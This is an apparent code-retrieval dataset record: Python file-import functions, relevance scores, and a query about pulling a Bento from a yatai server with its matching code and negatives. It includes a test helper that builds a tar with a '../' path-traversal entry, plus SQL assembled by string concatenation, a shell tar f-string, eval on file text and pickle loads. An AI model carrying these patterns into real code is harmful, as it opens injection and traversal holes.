"def put_upload_import_file() -> str:\n upload = request.files.get(\"file\", None)\n\n if not upload:\n raise FavaAPIError(\"No file uploaded.\")\n if not upload.filename:\n raise FavaAPIError(\"Uploaded file is missing filename.\")\n filepath = filepath_in_primary_imports_folder(upload.filename, g.ledger)\n\n if filepath.exists():\n raise TargetPathAlreadyExistsError(filepath)\n\n if not filepath.parent.exists():\n filepath.parent.mkdir(parents=True)\n\n upload.save(filepath)\n\n return f\"Uploaded to {filepath}\"",
"def file_importer(relPath, methodS = \"r\", encodeS = None):\n import os\n scriptDir = os.path.dirname(os.path.realpath(__file__)) # absolute dir this script is in\n absFilePath = os.path.join(scriptDir, relPath)\n # print(encodingS)\n inpF = open(absFilePath, methodS, encoding = encodeS)\n return inpF",
"def convert_dehaan():\n\n local('cd import_scripts;../bin/python import_dehaan.py import')",
"def command_import_from_hosted(self):\n import_from_hosted.main(*self.args())",
"def untar(conn, tarball, path):\n conn.run(f\"tar xf {tarball} -C {path}\")",
"def add(self, bento_name, bento_version):",
"def import_file(self, filename, **kwargs):\n raise NotImplementedError",
"def _import(self, __button):\r\n# WARNING: Refactor _import; current McCabe Complexity metric = 18.\r\n Widgets.set_cursor(self.modulebook.mdcRTK, gtk.gdk.WATCH)\r\n\r\n _import_errors = 0\r\n self._import_log.info('The following records could not be imported to '\r\n 'the open RTK database:\\n')\r\n\r\n # Find the number of existing incidents.\r\n if Configuration.BACKEND == 'mysql':\r\n _query = \"SELECT COUNT(*) FROM rtk_incident\"\r\n elif Configuration.BACKEND == 'sqlite3':\r\n _query = \"SELECT COALESCE(MAX(fld_incident_id)+1, 0) \\\r\n FROM rtk_incident\"\r\n (_num_incidents, _error_code, __) = self._dao.execute(_query,\r\n commit=False)\r\n for i in range(len(self._file_contents) - 1):\r\n _contents = []\r\n\r\n for j in range(len(self._file_index)):\r\n if self._file_index[j] == -1:\r\n _contents.append('')\r\n else:\r\n try:\r\n _contents.append(\r\n self._file_contents[i][self._file_index[j]])\r\n except IndexError:\r\n _contents.append('')\r\n\r\n _contents[14] = _contents[14].replace('$', '')\r\n\r\n # Remove any single and double quotes from the description and\r\n # remarks fields.\r\n for j in[4, 5, 8]:\r\n _contents[j] = _contents[j].replace('\\'', '')\r\n _contents[j] = _contents[j].replace('\\\"', '')\r\n\r\n # Remove any commas that may be in numerical fields.\r\n for j in [12, 14, 15]:\r\n _contents[j] = _contents[j].replace(',', '')\r\n\r\n # Convert all the date fields to ordinal dates.\r\n for j in [19, 22, 25, 28]:\r\n _contents[j] = Utilities.date_to_ordinal(_contents[j])\r\n\r\n # Convert missing values to correct default value.\r\n for j in [0, 1, 2, 3, 6, 7, 13, 15, 18, 20, 21, 23, 24, 26, 27,\r\n 29, 31, 32, 35, 36, 37, 38, 39]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), 0)\r\n except ValueError:\r\n _contents[j] = 0\r\n\r\n for j in [16, 17]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), -1)\r\n except ValueError:\r\n _contents[j] = -1\r\n\r\n for j in [12, 14, 33]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n float(_contents[j]), 0.0)\r\n except ValueError:\r\n _contents[j] = 0.0\r\n\r\n for j in [9, 34]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), 1)\r\n except ValueError:\r\n _contents[j] = 1\r\n\r\n if _contents[1] == 0 or _contents[1] is None or _contents[1] == '':\r\n _contents[1] = _num_incidents[0][0] + i + 1\r\n\r\n _query = \"INSERT INTO rtk_incident \\\r\n (fld_revision_id, fld_incident_id, \\\r\n fld_incident_category, fld_incident_type, \\\r\n fld_short_description, fld_long_description, \\\r\n fld_criticality, fld_detection_method, fld_remarks, \\\r\n fld_status, fld_test_found, fld_test_case, \\\r\n fld_execution_time, fld_unit, fld_cost, \\\r\n fld_incident_age, fld_hardware_id, fld_sftwr_id, \\\r\n fld_request_by, fld_request_date, fld_reviewed, \\\r\n fld_reviewed_by, fld_reviewed_date, fld_approved, \\\r\n fld_approved_by, fld_approved_date, fld_complete, \\\r\n fld_complete_by, fld_complete_date, fld_life_cycle, \\\r\n fld_analysis, fld_accepted) \\\r\n VALUES ({0:d}, {1:d}, {2:d}, {3:d}, '{4:s}', '{5:s}', \\\r\n {6:d}, {7:d}, '{8:s}', {9:d}, '{10:s}', \\\r\n '{11:s}', {12:f}, {13:d}, {14:f}, {15:d}, \\\r\n {16:d}, {17:d}, {18:d}, {19:d}, {20:d}, \\\r\n {21:d}, {22:d}, {23:d}, {24:d}, {25:d}, \\\r\n {26:d}, {27:d}, {28:d}, {29:d}, '{30:s}', \\\r\n {31:d})\".format(_contents[0], _contents[1],\r\n _contents[2], _contents[3],\r\n _contents[4], _contents[5],\r\n _contents[6], _contents[7],\r\n _contents[8], _contents[9],\r\n _contents[10], _contents[11],\r\n _contents[12], _contents[13],\r\n _contents[14], _contents[15],\r\n _contents[16], _contents[17],\r\n _contents[18], _contents[19],\r\n _contents[20], _contents[21],\r\n _contents[22], _contents[23],\r\n _contents[24], _contents[25],\r\n _contents[26], _contents[27],\r\n _contents[28], _contents[29],\r\n _contents[30], _contents[31])\r\n (_results,\r\n _error_code, __) = self._dao.execute(_query, commit=True)\r\n\r\n if _error_code == 0:\r\n _query = \"INSERT INTO rtk_incident_detail \\\r\n (fld_incident_id, fld_component_id, \\\r\n fld_age_at_incident, fld_failure, fld_suspension, \\\r\n fld_cnd_nff, fld_occ_fault, \\\r\n fld_initial_installation, fld_interval_censored) \\\r\n VALUES ({0:d}, {1:d}, {2:f}, {3:d}, \\\r\n {4:d}, {5:d}, {6:d}, {7:d}, \\\r\n {8:d})\".format(_contents[1], _contents[32],\r\n _contents[33], _contents[34],\r\n _contents[35], _contents[36],\r\n _contents[37], _contents[38],\r\n _contents[39])\r\n (_results,\r\n _error_code, __) = self._dao.execute(_query, commit=True)\r\n else:\r\n self._import_log.info('{0:d} - {1:s}'.format(_contents[1],\r\n _contents[4]))\r\n _import_errors += 1\r\n\r\n if _import_errors > 0:\r\n Widgets.rtk_information(_(u\"Error importing {0:d} program \"\r\n u\"incidents. Refer to the import log \"\r\n u\"{1:s} for more details.\").format(\r\n _import_errors, self._import_log))\r\n\r\n Widgets.set_cursor(self.modulebook.mdcRTK, gtk.gdk.LEFT_PTR)\r\n\r\n # Reload the Incident class gtk.TreeView().\r\n self._modulebook.request_load_data(self._dao, self._revision_id)\r\n\r\n return False",
"def import_file(self) -> 'outputs.FileMetadataResponse':\n return pulumi.get(self, \"import_file\")",
"def import_armature(self, n_armature):\n \n armature_name = self.nif_import.import_name(n_armature)\n b_armature_data = bpy.data.armatures.new(armature_name)\n b_armature_data.draw_type = 'STICK'\n b_armature_obj = create_b_obj(armature_name, b_armature_data)\n b_armature_obj.show_x_ray = True\n \n # make armature editable and create bones\n bpy.ops.object.mode_set(mode='EDIT',toggle=False)\n for n_child in n_armature.children:\n self.import_bone(n_child, b_armature_data, n_armature)\n self.fix_bone_lengths(b_armature_data)\n bpy.ops.object.mode_set(mode='OBJECT',toggle=False)\n if NifOp.props.animation:\n self.nif_import.animationhelper.create_action(b_armature_obj, armature_name+\"-Anim\")\n\n # The armature has been created in editmode,\n # now we are ready to set the bone keyframes.\n # if NifOp.props.animation:\n # self.nif_import.animationhelper.armature_animation.import_armature_animation(b_armature_obj)\n \n # constraints (priority)\n # must be done outside edit mode hence after calling\n for bone_name, b_posebone in b_armature_obj.pose.bones.items():\n n_block = self.nif_import.dict_blocks[bone_name]\n self.nif_import.animationhelper.armature_animation.import_bone_animation(n_block, b_armature_obj, bone_name)\n # find bone nif block\n if bone_name.startswith(\"InvMarker\"):\n bone_name = \"InvMarker\"\n # store bone priority, if applicable\n if n_block.name in self.nif_import.dict_bone_priorities:\n # TODO: Still use constraints to store priorities? Maybe use a property instead.\n constr = b_posebone.constraints.new('TRANSFORM')\n constr.name = \"priority:%i\" % self.nif_import.dict_bone_priorities[niBone.name]\n return b_armature_obj",
"def write_import_yml(import_path, target_path):\n import_path = pathlib.Path(import_path)\n import_yml_path = import_path / 'import.yml'\n with open(import_yml_path, 'a') as f:\n f.write('---\\n')\n f.write(f'path: \"{target_path}/files.tsv\"\\n')\n f.write('include: /hyperfile/omero/import_base.yml\\n')\n f.write('columns:\\n')\n f.write(' - target\\n')\n f.write(' - path\\n')\n return import_yml_path",
"def importAovs(self):\n\t\tLayersInfo = pickle.load( open( self.aovsPath.path, \"rb\") )\n\t\tmc.refresh( su = 1 )\n\t\tfor ao in LayersInfo.keys():\n\t\t\taov.create( ao, LayersInfo[ao]['name'], LayersInfo[ao]['type'], LayersInfo[ao]['enabled'] )\n\t\tmc.refresh( su = 0 )",
"def import_(socket, args, config, library, cmd=False):\n receiptpath = args['<receipt path>']\n lock = args['--lock']\n\n if not path.exists( receiptpath ):\n print \"Receipt does not exist at:\", receiptpath\n return\n\n if cmd: print \"Loading receipt file...\"\n receipt = load_receipt_file( receiptpath, lock )\n\n rename = args['--rename']\n while True:\n if library.get_receipt( receipt.get_filename() ):\n if not rename:\n if cmd: print \"File with same name exists, please rename.\"\n return False\n else:\n receipt.set_filename(rename)\n break\n else: break\n\n if cmd: print \"Importing Receipt...\"\n fileid = library.import_receipt( receipt )\n\n # If we are running via a shell, return the new file ID.\n # Else, print success.\n if fileid and cmd: print \"Success, file's id is now:\",fileid\n if not cmd: return fileid",
"def _outside_tar2(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.unsafe_common_dir / \"../a_file\")))\r\n\r\n return outside_tar",
"def import_(self, exported, update=False):\n for path in exported:\n kv = exported[path]\n fn = self.update if update else self.write\n fn(path, **kv)",
"def step_1(browser):\n browser.click_on(\"Import depuis eComptes\".decode('utf8'))",
"def bomb(self):\n\n filename = filedialog.askopenfile(initialdir=self.root.cache_dir,\n title='Select AVL Multilevel BOM',\n filetypes=[('Comma-Separated Values', '.csv')])\n self.b_entry.clear()\n self.b_entry.insert(tk.END, filename.name)\n self.root.b_entry = filename\n self.bom_b = filename.name",
"def import_oggbundle(app, args):\n setup_logging()\n\n # Discard the first three arguments, because they're not \"actual\" arguments\n # but cruft that we get because of the way bin/instance [zopectl_cmd]\n # scripts work.\n args = parse_args(sys.argv[3:])\n\n log.info(\"Importing OGGBundle %s\" % args.bundle_path)\n\n plone = setup_plone(get_first_plone_site(app))\n\n # mark request with GEVER layer\n alsoProvides(plone.REQUEST, IOpengeverBaseLayer)\n\n import_config_from_bundle(app, args)\n\n importer = BundleImporter(\n plone,\n args.bundle_path,\n disable_ldap=True,\n create_guid_index=True,\n no_intermediate_commits=args.no_intermediate_commits,\n possibly_unpatch_collective_indexing=True,\n no_separate_connection_for_sequence_numbers=True,\n )\n importer.run()\n\n log.info(\"Committing transaction...\")\n transaction.get().note(\n \"Finished import of OGGBundle %r\" % args.bundle_path)\n transaction.commit()\n log.info(\"Done.\")",
"def do_import(c: Cmdr, parent: Position, s: str) -> None:\n CText_Importer(c).import_from_string(parent, s)",
"def create(self):\n\t\tlipsBaseFile.imp()",
"def importBaseScene(self):\n logger.debug(\"Func: importBaseScene\")\n relSceneFile = self._currentSceneInfo[\"Versions\"][self._currentVersionIndex-1][\"RelativePath\"]\n absSceneFile = os.path.join(self.projectDir, relSceneFile)\n if os.path.isfile(absSceneFile):\n # cmds.file(absSceneFile, i=True)\n nuke.nodePaste(absSceneFile)\n return 0\n else:\n msg = \"File in Scene Manager database doesnt exist\"\n self._exception(210, msg)\n return -1, msg",
"def import_archive(archive, content_type=None):\n if content_type == \"text/xml\":\n import_report(archive.read())\n elif content_type in [\"application/gzip\", \"application/octet-stream\"]:\n with gzip.GzipFile(mode=\"r\", fileobj=archive) as zfile:\n import_report(zfile.read())\n else:\n with zipfile.ZipFile(archive, \"r\") as zfile:\n for fname in zfile.namelist():\n import_report(zfile.read(fname))",
"def import_file(self) -> pulumi.Input['FileMetadataArgs']:\n return pulumi.get(self, \"import_file\")",
"def import_migration(import_type: migration.Migration, file_name: str, session: Session = Depends(generate_session)):\n file_path = app_dirs.MIGRATION_DIR.joinpath(import_type.value, file_name)\n return migration.migrate(import_type, file_path, session)",
"def importScript():\n crosswalkFile = 'mayaToNuke.info'\n if os.path.exists(crosswalkFile):\n fileInfo = open(crosswalkFile, 'r')\n text = fileInfo.readlines()\n dic = eval(text[-1])\n nkFile = dic.get('file')\n if os.path.exists(nkFile):\n print 'importing: '+nkFile\n nuke.nodePaste(nkFile)\n else:\n print 'nuke script not found...'",
"def import_object(\n self,\n path: Union[bytes, str],\n import_data: Union[bytes, str],\n exists_ok: bool = False,\n ) -> bool:\n _check_bug_fixed(\n fixed_in=\"3.2\",\n details=\"FAPI Import will overwrite existing objects with same path silently. See https://github.com/tpm2-software/tpm2-tss/issues/2028\",\n )\n path = _to_bytes_or_null(path)\n import_data = _to_bytes_or_null(import_data)\n ret = lib.Fapi_Import(self._ctx, path, import_data)\n _chkrc(\n ret, acceptable=lib.TSS2_FAPI_RC_PATH_ALREADY_EXISTS if exists_ok else None\n )\n return ret == lib.TPM2_RC_SUCCESS",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def load(self, filename=None):\n importer = aspecd.io.AdfImporter()\n importer.source = filename\n importer.import_into(self)",
"def push_to_cartodb(f):\n print \"attempting to import into cartodb\"\n config = loadConfig()\n cl = CartoDBAPIKey(config[\"API_KEY\"],config[\"user\"])\n fi = FileImport(f,cl,table_name='python_table_test')\n fi.run()\n\n return fi.success",
"def load(journal: Journal, file: Path) -> None:",
"def boma(self):\n\n filename = filedialog.askopenfile(initialdir=self.root.cache_dir,\n title='Select AVL Multilevel BOM',\n filetypes=[('Comma-Separated Values', '.csv')])\n self.a_entry.clear()\n self.a_entry.insert(tk.END, filename.name)\n self.root.cache_dir = filename\n self.bom_a = filename.name",
"def unpack(backend_name, archive_id):\n backend = get_backend(backend_name)\n click.echo(f\"Retrieving archive {archive_id}\")\n backend.archive_retrieve(config.root_path, archive_id)",
"def _handle_import(contents, use_tags, owner):\n \n lines = contents.decode(\"utf-8\").split(\"\\n\")\n \n title = re.compile(r\"<a.*?>(.+?)</a>\", re.I)\n url = re.compile(r\"\"\"<a.*href=['\"](.+?)['\"]\"\"\", re.I)\n tags = re.compile(r\"\"\"<a.*?tags=[\"'](.+?)[\"']\"\"\", re.I)\n addTime = re.compile(r\"\"\"<a.*?add_date=[\"'](\\d+?)[\"']\"\"\", re.I)\n \n for l in lines:\n if \"<a\" in l.lower() and \"</a>\" in l.lower():\n bookmark = {}\n \n bookmark[\"title\"] = title.search(l)\n if not bookmark[\"title\"]:\n continue\n bookmark[\"title\"] = _unescape(bookmark[\"title\"].group(1))\n \n bookmark[\"url\"] = url.search(l)\n if not bookmark[\"url\"]:\n continue\n bookmark[\"url\"] = _unescape(bookmark[\"url\"].group(1))\n \n bookmark[\"tags\"] = [];\n if use_tags:\n result = tags.search(l)\n if result:\n bookmark[\"tags\"] = map(_unescape, result.group(1).split(\",\"))\n \n bookmark[\"added\"] = addTime.search(l)\n if bookmark[\"added\"]:\n bookmark[\"added\"] = bookmark[\"added\"].group(1)\n \n if not Bookmark.objects.filter(owner=owner, url=bookmark[\"url\"]).exists():\n bm = Bookmark(owner=owner, url=bookmark[\"url\"], title=bookmark[\"title\"])\n \n bm.save()\n if bookmark[\"added\"]:\n bm.added = datetime.datetime.fromtimestamp(int(bookmark[\"added\"]))\n \n for t in bookmark[\"tags\"]:\n bm.tag(t)\n \n bm.save()\n bm.autotag_rules()",
"def testArchiveImport(self):\n\n archive = alembic.Abc.IArchive(\"iterator.abc\")\n top = archive.getTop()\n\n # lets check the iterators\n self.assertEqual(len(top.children), 3)\n\n curI = 0\n for i in top.children:\n self.assertEqual(len(i.children), 3)\n self.assertEqual(i.getName(), 'childObj' + str(curI))\n curI += 1\n\n curJ = 0\n for j in i.children:\n self.assertEqual(j.getName(), \"grandChild\" + str(curJ))\n curJ += 1\n self.assertEqual(len(j.getProperties().propertyheaders), 3)\n curK = 0\n for k in j.getProperties().propertyheaders:\n self.assertEqual(k.getName(), 'prop' + str(curK))\n cp = alembic.Abc.ICompoundProperty(j.getProperties(), 'prop' + str(curK))\n curK += 1\n\n sp = alembic.Abc.IStringProperty(cp, 'scalar')\n samp = sp.samples\n self.assertEqual(len(samp), 3)\n self.assertEqual(samp[0], \"a\")\n self.assertEqual(samp[1], \"b\")\n self.assertEqual(samp[2], \"c\")\n\n ap = alembic.Abc.IStringArrayProperty(cp, 'array')\n samp = ap.samples\n self.assertEqual(len(samp), 3)\n self.assertEqual(len(samp[0]), 3)\n self.assertEqual(len(samp[1]), 2)\n self.assertEqual(len(samp[2]), 1)\n self.assertEqual(samp[0][0], 'a')\n self.assertEqual(samp[0][1], 'b')\n self.assertEqual(samp[0][2], 'c')\n self.assertEqual(samp[1][0], 'd')\n self.assertEqual(samp[1][1], 'e')\n self.assertEqual(samp[2][0], 'f')",
"def import_forward(self):\n self.import_property('OG')\n self.import_property('IBU')\n self.import_property('ABV')\n self.import_property('SRM')",
"def svn_client_import2(svn_commit_info_t_commit_info_p, char_path, char_url, svn_boolean_t_nonrecursive, svn_boolean_t_no_ignore, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass",
"def _import_file(self, ext_src, dst_path):\n if not self.mount():\n return False\n _log(\"AnnexGvfsBackend._import_file(%r -> %r)\" % (ext_src, dst_path))\n tmp_path = \"transfer/%s.part\" % os.path.basename(dst_path)\n tmp_dir_uri = self.path_to_uri(os.path.dirname(tmp_path))\n dst_dir_uri = self.path_to_uri(os.path.dirname(dst_path))\n tmp_uri = self.path_to_uri(tmp_path)\n dst_uri = self.path_to_uri(dst_path)\n try:\n if not self.gvfs.create_dir_p(tmp_dir_uri):\n raise IOError()\n if not self.gvfs.create_dir_p(dst_dir_uri):\n raise IOError()\n if not self.gvfs.copy_file(ext_src, tmp_uri):\n raise IOError()\n if not self.gvfs.rename_file(tmp_uri, dst_uri):\n raise IOError()\n except IOError:\n self.gvfs.delete_file(tmp_uri)\n return False\n else:\n return True",
"def start_import(data_import):\n\tdata_import = frappe.get_doc(\"Data Import Beta\", data_import)\n\ti = Importer(data_import.reference_doctype, data_import=data_import)\n\treturn i.import_data()",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)",
"def archive(po_filename, bl_filename):\n\n # Store archive in same dir as this script\n root = os.path.abspath(os.path.dirname(sys.argv[0]))\n\n po_archive = root + '/po.csv.%s' % datetime.date.today()\n bl_archive = root + '/bl.csv.%s' % datetime.date.today()\n\n shutil.move(po_filename, po_archive)\n shutil.move(bl_filename, bl_archive)\n\n perms = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH\n os.chmod(po_archive, perms)\n os.chmod(bl_archive, perms)",
"def move_tobchecked_in_tbimported(self, data):\r\n conf = self.func.config_info()\r\n folder_name = self.bid_folder_name() \r\n\r\n if \"ProofreaderStatus\" in list(data.keys()):\r\n if data[\"ProofreaderStatus\"] == \"TO BE IMPORTED\":\r\n files = os.listdir(conf[\"path_to_batches_tobechecked\"])\r\n if folder_name in files:\r\n src = os.path.join(conf[\"path_to_batches_tobechecked\"], folder_name)\r\n dst = os.path.join(conf[\"path_to_batches_tbimported\"], folder_name)\r\n self.func.move_folder(src, dst)\r\n\r\n if not self.func.folder_exists(dst):\r\n raise Exception(\"Folder {} not moved in '5 TO BE IMPORTED'!\".format(folder_name))\r\n else:\r\n raise Exception(\"Folder {} not found in '4 TO BE CHECKED'!\".format(folder_name))",
"def importLightLinking(self, asset = '', searchAndReplace = ['',''] ):\n\t\tLayersInfo = pickle.load( open( self.lightLinkPath.path, \"rb\") )\n\t\tmc.refresh( su = 1 )\n\t\tif not asset == '':\n\t\t\tLayersInfo = self.filterLightLinksData( LayersInfo , asset, searchAndReplace )\n\t\tfor l in LayersInfo.keys():\n\t\t\tobjsToBreakLink = []\n\t\t\tfor link in LayersInfo[l]:\n\t\t\t\tif mc.objExists( link ):\n\t\t\t\t\tobjsToBreakLink.append( link )\n\t\t\tmc.lightlink( b = True, light = l, o = objsToBreakLink )\n\t\tmc.refresh( su = 0 )",
"def interface_import(filepath, puzzle, command_color=\"#ff8800\", arg_color=\"#5588ff\", error_color=\"#ff0000\"):\n try:\n puzzle.import_puzzle(filepath)\n print(f\"successfully imported {colored(filepath, arg_color)}\")\n except ValueError:\n print(f\"{colored('Error:', error_color)} The path must lead to a .ggb file including the file ending.\")\n except FileNotFoundError:\n print(f\"{colored('Error:', error_color)} Invalid file path, try again.\")",
"def _unpack_archive(self):\n with zipfile.ZipFile(self._archive_full_path, 'r') as zip_ref:\n zip_ref.extractall(self._storage_path)\n\n _logger.debug('Archive has been unpacked.')",
"def importaccount(account, roles):\n from morphenepythongraphenebase.account import PasswordKey\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n account = Account(account, morphene_instance=stm)\n imported = False\n password = click.prompt(\"Account Passphrase\", confirmation_prompt=False, hide_input=True)\n if not password:\n print(\"You cannot chose an empty Passphrase\")\n return\n if \"owner\" in roles:\n owner_key = PasswordKey(account[\"name\"], password, role=\"owner\")\n owner_pubkey = format(owner_key.get_public_key(), mph.prefix)\n if owner_pubkey in [x[0] for x in account[\"owner\"][\"key_auths\"]]:\n print(\"Importing owner key!\")\n owner_privkey = owner_key.get_private_key()\n mph.wallet.addPrivateKey(owner_privkey)\n imported = True\n\n if \"active\" in roles:\n active_key = PasswordKey(account[\"name\"], password, role=\"active\")\n active_pubkey = format(active_key.get_public_key(), mph.prefix)\n if active_pubkey in [x[0] for x in account[\"active\"][\"key_auths\"]]:\n print(\"Importing active key!\")\n active_privkey = active_key.get_private_key()\n mph.wallet.addPrivateKey(active_privkey)\n imported = True\n\n if \"posting\" in roles:\n posting_key = PasswordKey(account[\"name\"], password, role=\"posting\")\n posting_pubkey = format(posting_key.get_public_key(), mph.prefix)\n if posting_pubkey in [\n x[0] for x in account[\"posting\"][\"key_auths\"]\n ]:\n print(\"Importing posting key!\")\n posting_privkey = posting_key.get_private_key()\n mph.wallet.addPrivateKey(posting_privkey)\n imported = True\n\n if \"memo\" in roles:\n memo_key = PasswordKey(account[\"name\"], password, role=\"memo\")\n memo_pubkey = format(memo_key.get_public_key(), mph.prefix)\n if memo_pubkey == account[\"memo_key\"]:\n print(\"Importing memo key!\")\n memo_privkey = memo_key.get_private_key()\n mph.wallet.addPrivateKey(memo_privkey)\n imported = True\n\n if not imported:\n print(\"No matching key(s) found. Password correct?\")",
"def import_datafile(db, infile):\n res = stat(infile)\n mtime = datetime.utcfromtimestamp(res.st_mtime)\n\n hash = md5hash(infile)\n\n data_file = db.model.data_file\n\n # Should maybe make sure error is not set\n rec = db.get(data_file, hash)\n # We are done if we've already imported\n if rec is not None:\n return False\n\n # Values to insert\n cols = dict(\n file_hash=hash,\n file_mtime=mtime,\n basename=infile.stem,\n csv_data=None)\n\n try:\n cols['csv_data'] = extract_datatable(infile)\n except NotImplementedError as e:\n secho(str(e), fg='red', dim=True)\n\n tbl = data_file.__table__\n sql = (insert(tbl)\n .values(file_path=str(infile), **cols)\n .on_conflict_do_update(\n index_elements=[tbl.c.file_path],\n set_=dict(**cols)))\n db.session.execute(sql)\n return True",
"def importFile(self):\n\n ## Backing up old CSV and JSON files before beginning import operations\n if os.path.isfile(\"text_files/customers.csv\") and os.path.isfile(\"text_files/customers.json\"):\n print(\"\\nCreating a backup of the existing customer .csv and .json files before overwriting\")\n shutil.copy2(\"text_files/customers.csv\", \"text_files/customers.csv.backup\" + str(time.time()))\n shutil.copy2(\"text_files/customers.json\", \"text_files/customers.json.backup\" + str(time.time()))\n\n ## Importing the text file for cleaning then converting to CSV\n input_file = open(\"text_files/customer_export.txt\", \"r\")\n output_file = open(\"text_files/customers.csv\", \"w\")\n\n ## A loop to clean and write the customer_export txt file to a CSV\n for line in input_file:\n clean_text = \"\"\n check_line = line.replace(\"#\", \"\").replace(\",,\",\"\").split(\"|\")\n for line in check_line:\n if line != check_line[10]:\n clean_text += line + \",\"\n elif line == check_line[10]:\n clean_text += line + \"\\n\"\n output_file.write(clean_text)\n\n ## Closing TXT file and CSV file after formatting\n input_file.close()\n output_file.close()\n\n ## Opening the cleaned CSV file for conversion to Json\n with open('text_files/customers.csv') as clean_csv:\n ## Converting CSV file to Json\n converted = csv.DictReader(clean_csv)\n rows = list(converted)\n\n ## Writing converted CSV to Json file\n with open('text_files/customers.json', 'w') as convert:\n json.dump(rows, convert)\n\n ## Deleting all data currently in database before importing new file\n db_connection.executeQuery(\"DELETE FROM CRM;DBCC CHECKIDENT ('CRM', RESEED, 0) DELETE FROM Mailings; DBCC CHECKIDENT ('Mailings', RESEED, 0) COMMIT\") \n\n ## Loading the newly created Json file\n with open(\"text_files/customers.json\") as customers_json:\n customers = json.load(customers_json)\n\n ## A loop to add the contents of the Json file to the database \n print(\"Writing imported file to database please wait...\")\n for key in customers:\n db_connection.executeQuery(\"INSERT INTO dbo.CRM (f_name, l_name, company, address, city, county, state, zip, primary_phone, secondary_phone, email_address) VALUES ('\" + key[\"first_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"last_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"company_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"address\"] + \"', '\" + key[\"city\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"county\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"state\"] + \"', '\" + str(key[\"zip\"]) + \"', '\" + key[\"phone1\"] + \"', '\" + key[\"phone2\"] + \"' , '\" + key[\"email\"] + \"'); COMMIT\")\n db_connection.executeQuery(\"INSERT INTO dbo.Mailings (name, company, address) VALUES ('\" + key[\"first_name\"].replace(\"\\'\", \"\\'\\'\") + \" \" + key[\"last_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"company_name\"].replace(\"\\'\", \"\\'\\'\") + \"','\" + key[\"address\"] + \" \" + key[\"city\"] + \" \" + key[\"county\"] + \" \" + key[\"state\"] + \" \" + str(key[\"zip\"]) + \"'); COMMIT\") \n\n print(\"\\nFinished writing to file. Returning to main menu...\")",
"def test_save_load(self):\n lib = archive([])\n f = io.StringIO()\n lib.save(f)\n f2 = io.StringIO(f.getvalue())\n lib2 = get_archive(f2)\n self.assertTrue(lib2)"
] | [
"0.6098828",
"0.6013871",
"0.5977933",
"0.58846664",
"0.5881364",
"0.5841038",
"0.57228506",
"0.56769913",
"0.5621053",
"0.56173635",
"0.5589252",
"0.55258936",
"0.5518586",
"0.5502786",
"0.54741645",
"0.5466958",
"0.545687",
"0.5419559",
"0.5372282",
"0.5365402",
"0.53363955",
"0.53265685",
"0.53158617",
"0.5307871",
"0.52951664",
"0.5284183",
"0.5268203",
"0.5259921",
"0.5199496",
"0.51926446",
"0.5182451",
"0.51743376",
"0.5166602",
"0.51228464",
"0.5114623",
"0.5111141",
"0.5095284",
"0.5092876",
"0.5091494",
"0.50857437",
"0.5082489",
"0.5081757",
"0.5081756",
"0.5073406",
"0.5072903",
"0.50599664",
"0.50454944",
"0.50182307",
"0.5013713",
"0.5001857",
"0.4982066",
"0.4954222",
"0.49528417",
"0.49214897",
"0.49176133",
"0.49161294",
"0.49022734",
"0.49011463",
"0.4897455",
"0.48935613",
"0.48855028",
"0.4885252",
"0.48801675",
"0.48795766",
"0.48794818",
"0.48690042",
"0.48539242",
"0.48484388",
"0.483954",
"0.4836835",
"0.48349655",
"0.48316735",
"0.4830181",
"0.48223636",
"0.4821072",
"0.48152065",
"0.48097154",
"0.48097154",
"0.48097154",
"0.479475",
"0.4793695",
"0.47793463",
"0.4775757",
"0.4770457",
"0.47680488",
"0.4746685",
"0.47370547",
"0.4727701",
"0.4721938",
"0.47115594",
"0.4710818",
"0.47095883",
"0.4708641",
"0.47068685",
"0.47055724",
"0.4695564",
"0.4695478",
"0.46791616",
"0.46741948",
"0.46738198"
] | 0.6817035 | 0 |
Pull Bento from a yatai server. | def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)
yatai_client.pull_bento(bento_tag, force=force) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"async def _pull(self) -> None:\n raise NotImplementedError()",
"def pull(self):",
"def _pull(self) -> None:\n raise NotImplementedError() # pragma: no cover",
"def pull_from_postmaster(self):\n # TODO: Assuming first server is good - need to make fallback logic\n return self.session.get_any(\"{base}{request_url}\".format(base=self.servers[0],\n request_url=F\"/Destiny2/Actions/Items/PullFromPostmaster/\"))",
"def get(self, bento_name, bento_version):",
"def make_pull(db,url):\n result = db.product_mstator.find_one({\"url\":url})\n return result",
"def fetch_pull(ref):\n origin.fetch(tags=True)\n repo.git.checkout(\"{}\".format(ref))\n repo.git.pull(\"origin\", \"{}\".format(ref))",
"def pull(self):\n origin = self.git_repo.remotes.origin\n origin.pull()",
"def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.id)\n self.__init__(**data)",
"async def _pull_now(self) -> None:\n raise NotImplementedError()",
"def pull(self, *arg, **kwds):\n pass",
